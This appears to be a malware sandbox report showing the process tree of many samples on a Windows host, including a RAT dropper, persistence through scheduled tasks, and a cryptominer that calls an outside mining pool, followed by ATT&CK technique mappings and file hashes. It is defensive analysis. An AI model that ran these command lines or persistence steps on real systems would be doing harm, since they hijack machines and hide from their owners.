C:\Users\Admin\AppData\Local\Temp\7zO42F971AB\2c01b007729230c415420ad641ad92eb.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F971AB\2c01b007729230c415420ad641ad92eb.exe"3⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:5540 -
C:\Users\Admin\AppData\Roaming\wou\odm.exe"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex4⤵PID:2560
-
C:\Users\Admin\AppData\Roaming\wou\odm.exeC:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\KSRVT5⤵PID:10900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42FD6FAB\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"C:\Users\Admin\AppData\Local\Temp\7zO42FD6FAB\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"3⤵PID:5712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 3244⤵
- Program crash
PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F77CAB\Archive.zip__ccacaxs2tbz2t6ob3e.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F77CAB\Archive.zip__ccacaxs2tbz2t6ob3e.exe"3⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:5792
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F4CCAB\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F4CCAB\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"3⤵PID:4408
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F3D99C\2019-09-02_22-41-10.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F3D99C\2019-09-02_22-41-10.exe"3⤵PID:10128
-
C:\Users\Admin\AppData\Local\Temp\7zO42F3D99C\2019-09-02_22-41-10.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F3D99C\2019-09-02_22-41-10.exe"4⤵PID:10048
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F124AC\b2bd3de3e5b0e35313263bef4b1ca49c5478d472f6d37d1070a57b1f6aa4f7bb (2).exe"C:\Users\Admin\AppData\Local\Temp\7zO42F124AC\b2bd3de3e5b0e35313263bef4b1ca49c5478d472f6d37d1070a57b1f6aa4f7bb (2).exe"3⤵PID:9036
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_REVENGE-RAT.js.zip\REVENGE-RAT.js"2⤵PID:1160
-
C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"4⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:5828 -
C:\Users\Admin\Documents\foldani.exe"C:\Users\Admin\Documents\foldani.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:964 -
C:\Users\Admin\Documents\foldani.exe"C:\Users\Admin\Documents\foldani.exe"6⤵
- Looks for VMWare services registry key.
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
PID:1984 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q2aidoeb.cmdline"7⤵
- Drops startup file
PID:196 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA73.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD04906005A6841C0BC9FF8905A377B27.TMP"8⤵
- System Location Discovery: System Language Discovery
PID:6136
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 10 /tn "bladzabi" /tr "C:\Users\Admin\Documents\foldani.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:2260
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cahk0-md.cmdline"7⤵PID:2196
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB00.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE82D03B3941B41EC8CACD420276A68DE.TMP"8⤵PID:5320
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2wx99xn8.cmdline"7⤵PID:1600
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB8C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBE68F38225A84B6881B32AC2E1BA4E7A.TMP"8⤵PID:5432
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4brb8oeo.cmdline"7⤵PID:5388
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDBEA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc66FCA8BA12754836A05B8C92E872F214.TMP"8⤵PID:5856
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rznz0thh.cmdline"7⤵PID:5284
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC38.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5F73DC5FA79E4250B2112A7826F54DC4.TMP"8⤵PID:1148
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bd269f_0.cmdline"7⤵
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDCA6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA9410F36215D4CE7BE83227BADF1C1D5.TMP"8⤵
- System Location Discovery: System Language Discovery
PID:1432
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kbcyd-hb.cmdline"7⤵PID:4836
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD23.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE4C9BF43533546DD8ABDB1A8385547B7.TMP"8⤵PID:432
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\obykcelk.cmdline"7⤵PID:3472
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD80.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8F49FB8A5E3E4DDC96E632F2CD29EA8.TMP"8⤵PID:5604
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\n6nrh8or.cmdline"7⤵PID:496
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDDE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9BBE05268440473BB7A7F15FBE781CE1.TMP"8⤵PID:5648
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zozcnsay.cmdline"7⤵
- System Location Discovery: System Language Discovery
PID:3068 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE3C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9C1CEAD8F4794912B65E91914B85A5.TMP"8⤵PID:5660
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zb-3rrrp.cmdline"7⤵PID:3864
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8F56C5C9AD6487082F117061CDF531.TMP"8⤵PID:5540
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x3nbat93.cmdline"7⤵
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF17.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9D15E6E475EE41D6AD7EEFBE94BFD277.TMP"8⤵PID:5448
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\SysWOW64\cmstp.exe"2⤵
- System Location Discovery: System Language Discovery
PID:5892 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\2.exe"3⤵PID:5716
-
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"2⤵PID:7988
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\18.exe"3⤵PID:1932
-
-
-
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"2⤵PID:7940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4852 -ip 48521⤵PID:2016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3332 -ip 33321⤵PID:4144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3636 -ip 36361⤵PID:2204
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1912
-
C:\Programdata\RealtekHD\taskhost.exeC:\Programdata\RealtekHD\taskhost.exe1⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2060 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe2⤵
- Executes dropped EXE
PID:2556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list3⤵PID:4020
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list4⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Windows Service" /F3⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Windows Service" /F4⤵PID:4628
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵PID:1844
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵PID:2888
-
C:\Windows\system32\gpupdate.exegpupdate /force3⤵PID:2500
-
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u RandomX_CPU --donate-level=1 -k -t42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Users\Admin\WinService.exeC:\Users\Admin\WinService.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2612 -ip 26121⤵PID:908
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3668
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s AppMgmt1⤵PID:2348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:1588
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4836
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4408
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2064
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:3348
-
C:\Program Files (x86)\Security Task Manager\TaskMan.exe"C:\Program Files (x86)\Security Task Manager\TaskMan.exe"2⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Checks system information in the registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2252
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2300 -ip 23001⤵PID:4380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4360 -ip 43601⤵PID:1480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 3600 -ip 36001⤵PID:5188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3220 -ip 32201⤵PID:5328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2580 -ip 25801⤵PID:5408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5560 -ip 55601⤵PID:5944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5240 -ip 52401⤵PID:1384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5208 -ip 52081⤵PID:2420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5768 -ip 57681⤵PID:396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3332 -ip 33321⤵PID:2320
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6028 -ip 60281⤵PID:1580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4872 -ip 48721⤵PID:3216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5396 -ip 53961⤵PID:2720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5712 -ip 57121⤵PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5828 -ip 58281⤵PID:4932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1520 -ip 15201⤵PID:5760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1508 -ip 15081⤵PID:9088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2456 -ip 24561⤵PID:6456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1616 -ip 16161⤵PID:3668
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:7656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1976 -ip 19761⤵PID:9940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10736 -ip 107361⤵PID:8988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9036 -ip 90361⤵PID:5696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2720 -ip 27201⤵PID:10068
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵PID:10376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 9168 -ip 91681⤵PID:8152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 732 -ip 7321⤵PID:6608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5380 -ip 53801⤵PID:6272
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
1Winlogon Helper DLL
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
1Winlogon Helper DLL
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
4Hidden Files and Directories
3Hidden Users
1Impair Defenses
5Disable or Modify System Firewall
2Disable or Modify Tools
2Indicator Removal
3Clear Persistence
1File Deletion
2Modify Registry
10Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Password Policy Discovery
1Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
10Remote System Discovery
1Software Discovery
1Security Software Discovery
1System Information Discovery
9System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD53733003588acfbc9ff5df9765c80d405
SHA1b52befaf06a525407de46499706ffda1df024263
SHA2560c87006a32e187cb1fef06dc9f19b547c78909e88ab59cc89d7b53aebbae9b4a
SHA512b6c94eabecb85a507395c4a6c3717471bf2486d5b4dba8d946c0ae960af673455e9ff338f5c6bc33bb55b363c2d6a51fb0660d0aa0d99c6914ffb514f38be32b
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-48EE1B4B.[[email protected]].BOMBO
Filesize3.2MB
MD506237c44e27c742edf03e5be06c80421
SHA1cbf92a316202aafa0276e8eb4e2afcc385d35cfc
SHA2564203ca79f976987cac6911875b5c66d21b7763de622007efe522a6acfb3dd080
SHA512f741c988b13bd665d22f99f1331e01d7c4ccb90e1cb41f0b809b2a97a26872411b3c6e3bc34828c081705fa7cffafe78ba35f598b5172ab30fa0e49deb87be17
-
Filesize
887KB
MD5ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
Filesize
5.8MB
MD523d51bd68920fdfd90809197b8c364ff
SHA15eee02db6087702db49acb2619e37d74833321d9
SHA2560e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1
SHA5123159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7
-
Filesize
1.7MB
MD5676f368fed801fb2a5350f3bdc631d0b
SHA1e129c24447d7986fb0ed1725b240c00d4d9489ea
SHA2565c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145
SHA512d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d
-
Filesize
2.9MB
MD521feb5dccba8bf69df9a2307d206d033
SHA165fc243a3530225903bf422f19ffd0e3aad66f03
SHA256ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493
SHA512b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
140B
MD55e36713ab310d29f2bdd1c93f2f0cad2
SHA17e768cca6bce132e4e9132e8a00a1786e6351178
SHA256cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA5128e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1
-
Filesize
12KB
MD54dc0fba4595ad8fe1f010f9079f59dd3
SHA1b3a54e99afc124c64978d48afca2544d75e69da5
SHA256b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a
SHA512fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8
-
Filesize
1KB
MD56a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1235a78495192fc33f13af3710d0fe44e86a771c9
SHA2564ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
155KB
MD588318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
Filesize
593KB
MD56298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
Filesize
1.1MB
MD5701f0baf56e40757b2bf6dabcdcfc7aa
SHA1cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4
SHA2568e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370
SHA512e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190
-
Filesize
112B
MD5ed57b78906b32bcc9c28934bb1edfee2
SHA14d67f44b8bc7b1d5a010e766c9d81fb27cab8526
SHA256c3a1bd76b8539fdf83b723f85b6ea7cd35104b0ec14429774059208d2660177d
SHA512d2a95257e37b4b4154aec2234e31423632598a870d2bb803ce27cb242d5bdff5ea1b7475577245f80d3ad069872e9ae2adcd05d5145e081db864185a5e7bda33
-
Filesize
418B
MD5db76c882184e8d2bac56865c8e88f8fd
SHA1fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92
-
Filesize
91B
MD599bde3452748e34d6c50275110a6a8d4
SHA1e79cb2a8db7d8490523529d3861f95ba73a20c23
SHA256d07311acf641866e7e84823d2962f593bb655792301dc61ad6f0c6869d9c5937
